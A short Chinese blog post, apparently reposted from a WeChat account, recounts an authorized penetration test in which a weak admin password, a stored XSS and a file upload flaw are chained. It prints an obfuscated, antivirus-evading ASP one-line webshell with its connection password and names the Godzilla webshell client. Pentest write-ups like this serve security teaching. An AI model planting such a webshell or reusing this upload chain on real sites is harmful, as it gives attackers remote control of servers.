免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
授权项目上的渗透测试,漏洞有网站弱口令—存储型XSS—文件上传。
1►
前言
本文由知识星球《网络安全情报攻防站》星友堂主投稿,感谢投稿。授权项目下常规的渗透测试。欢迎朋友们积极投稿,投稿有奖励。天冷了来领奶茶钱
2►
正文
网站首页
首页啥都没有,找到网站后台
弱口令
试试adminadmin
由于是内网业务系统一发直接干进去了
XSS漏洞
后台上传文件处
文件上传
免杀木马
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>连接密码为:c
还是在这里上传
哥斯拉
测试完毕,编写报告交差。
3►
总结
在进行常规的渗透测试时,看到功能点要进行挨个测试,指不定就有漏洞,细心一点干就完了。
原文始发于微信公众号(李白你好):记一次公司项目上的常规渗透测试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论